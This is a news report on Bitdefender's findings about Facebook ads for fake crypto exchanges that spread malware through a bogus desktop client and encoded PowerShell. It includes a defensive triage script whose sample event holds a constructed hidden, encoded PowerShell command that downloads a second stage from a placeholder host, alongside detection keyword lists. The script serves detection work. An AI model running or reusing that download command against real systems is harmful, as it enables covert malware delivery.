Fake Crypto Exchange Ads on Facebook Spread Malware

Bitdefender exposes Facebook ad scams using fake crypto sites and celebrity lures to spread malware via malicious desktop clients and PowerShell scripts.
A persistent malware campaign is exploiting Facebook’s advertising network to target cryptocurrency enthusiasts, security researchers at Bitdefender revealed today.
The operation leverages the trusted names of major cryptocurrency exchanges like Binance and TradingView, and images of celebrities such as Elon Musk and Zendaya in Facebook ads to lend credibility to the fake cryptocurrency exchange promotions and lure unsuspecting users into downloading malicious software.
Bitdefender’s investigation, shared with Hackread.com ahead of publication, found a multi-layered attack that delivers malware through a covert communication channel between the website and the victim’s own computer.
According to researchers, cybercriminals are hijacking Facebook accounts or creating fake ones to run deceptive ads promising quick financial gains or crypto bonuses. Clicking these ads redirects victims to convincing but fraudulent websites that mimic legitimate cryptocurrency platforms, urging them to download a “desktop client.”
When downloaded, the desktop client drops a malicious DLL file, which launches a local .NET-based server on the victim’s machine. This server acts as a hidden C2 centre. The fake website’s front end contains a deobfuscated script that communicates with the server, sends WMI (Windows Management Instrumentation) queries, and instructs it to execute further malicious payloads.
The final stage often involves the execution of multiple encoded PowerShell scripts, which download additional malware from remote servers. Furthermore, the attackers implement advanced anti-sandbox checks, ensuring that the malware is only delivered to users who meet specific demographic and behavioural profiles deemed valuable by the cybercriminals.
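The two behaviours described above, a downloaded “desktop client” spawning PowerShell and that PowerShell running encoded commands that fetch further payloads, are what a defender can look for in process-creation telemetry. The following triage script is an added example, not code from Bitdefender or the article; the event records, dropper name and URL in it are constructed placeholders.

```python
import base64
import re

# Constructed Sysmon/4688-style process-creation records for illustration only;
# none of the paths, names or URLs are indicators from the Bitdefender report.
def _enc(script: str) -> str:
    # PowerShell's -EncodedCommand expects base64 over UTF-16LE text.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\ExchangeDesktopClient.exe",  # hypothetical dropper
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("Invoke-WebRequest -Uri http://placeholder.invalid/stage2 -OutFile $env:TEMP\\s2.ps1")},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},  # benign admin use
]

# Longest alias first so "-enc" is not consumed by the shorter "-e".
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
REMOTE_FETCH = ("invoke-webrequest", "downloadstring", "downloadfile", "start-bitstransfer", "iwr ")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")

def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event: dict) -> list:
    """Return the detection labels that apply to one PowerShell process-creation event."""
    findings = []
    if "powershell" not in event["image"].lower():
        return findings
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded-powershell")
        if any(k in decoded.lower() for k in REMOTE_FETCH):
            findings.append("decoded-command-fetches-remote-payload")
    if any(p in event["parent"].lower() for p in USER_WRITABLE):
        findings.append("powershell-spawned-from-user-writable-path")
    return findings

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent"], "->", triage(ev) or "no findings")
```

Decoding the command before matching matters because the base64 text itself carries none of the download keywords a plain string rule would look for.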
Bitdefender researcher Ionut Baltariu highlighted that users without specific Facebook ad tracking parameters, those not logged into Facebook, or those with uninteresting IP addresses or operating systems are shown harmless content instead. This targeted approach allows the attackers to maximize their impact while minimizing exposure to security analysis.
The scale of the operation is significant: researchers have identified hundreds of Facebook accounts actively promoting these malicious pages. In one case, a single page ran over 100 ads in just 24 hours.
While Facebook often removes these fraudulent ads, many gather thousands of views before being taken down. The targeting is often finely tuned, with one instance focusing on men aged 18 and over in Bulgaria and Slovakia.
Adding another layer of deception, the attackers have even created fake Facebook pages that perfectly mirror the official pages of platforms like TradingView, complete with fabricated posts and comments touting fake giveaways. However, the links embedded in these fake pages lead directly to the malware-distributing websites.
Facebook’s continued role as a vector for malware distribution is hard to overlook given earlier findings, including today’s discovery from Morphisec that cybercriminals have been using deceptive Facebook ads promoting fake AI platforms to distribute the new Noodlophile Stealer.
It also shows how cybercriminals exploit the platform’s reach and advertising capabilities for malicious purposes, emphasizing the need for user vigilance and platform security enhancements.
Bitdefender advises users to be cautious of online ads, use scam and link-checking tools, keep security software updated and report suspicious ads on Facebook to stay protected.
HackRead